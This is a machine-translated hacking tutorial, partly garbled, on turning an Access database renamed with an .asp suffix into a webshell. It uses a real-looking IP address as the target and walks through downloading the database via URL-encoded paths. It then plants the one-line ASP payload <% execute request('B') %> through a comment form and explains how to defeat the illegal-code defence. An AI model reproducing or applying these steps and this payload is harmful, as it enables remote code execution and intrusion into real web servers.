It may be that with the development of network security technology, the quality of administrators is improving. When using the access + ASP system, the MDB is changed to ASP or ASA for non-database downloads. If you do not directly change the suffix, you can directly download it using tools such as quickshield. In fact, you have opened the door for intruders. Intruders can use a database suffixed with ASP/ASA to directly obtain webshells.
I. Ideas
As we all know, <%> is the identifier of the ASP file. That is to say, an ASP file only executes code between <%>, all data in the access + ASP Web system is stored in the database file (MDB file). Because the Administrator changes the MDB file to an ASP file, if the submitted data contains <%>, the code between <%> is executed when we access the ASP database. As a result, we only submit malicious code to the database, so the database with the ASP suffix is our webshell.
Ii. Example
Find a target at will. First, let's use a database with an ASP Suffix:
Http: // 220.170.151.103/test/dlog % 5cshowlog. asp? Cat_id = 5 & log_id = 210
Return Value:
Microsoft VBScript compiler error: '800a03f6'
'End' missing'
/IISHelp/common/500-100.asp, row 242
Microsoft Jet Database Engine error '20140901'
'D:/log_mdb/% 29dlog_mdb % 29. asp 'is not a valid path. Check whether the path name is correctly spelled and whether it is connected to the server where the file is stored.
/Test/Conn. asp, Row 18
We submit: http: // 220.170.151.103/test/dlog/log_mdb/% 2529dlog_mdb % 2529. ASP returns a bunch of garbled characters so that we can directly download the database using tools such as Internet Express (which we will not discuss here ). On the homepage, we can see that the "user comments" function is provided. We registered a user and sent a comment:
<% Execute request ("B") %>
In this way, the ASP code <% execute request ("B") %> is written to the database, so the database is our webshell. Submit: http: // 220.170.151.103/test/dlog/log_mdb/% 2529dlog_mdb % 2529. asp at the end of the Garbled text, we can see:
/IISHelp/common/500-100.asp, row 242
Microsoft VBScript runtime error '800a000d'
Type Mismatch: 'execute'
/Test/dlog/log_mdb/% 29dlog_mdb % 29.asp, row 1266
The inserted code is running. For example:
Note: When submitting code to the database, the Code content cannot be too large. Therefore, we use <% execute request ("B") %>.
Iii. Other questions and ideas
1. if the suffix is changed to ASP, illegal ASP Code such as <% = 'a'-1%> is added to the database to completely prevent the downloaded database, because there is illegal ASP code in it, inserting our webshell code and running it will only display the previous error of illegal code, rather than executing our shell code. Although this can prevent certain attacks, there are still some hidden risks. We only need to add the compatible error code before the error code, the inserted webshell code is displayed correctly.
2. for MDB files that do not have a suffix changed, we can download the background password and enter the background. We can use the database backup to change the suffix to ASP.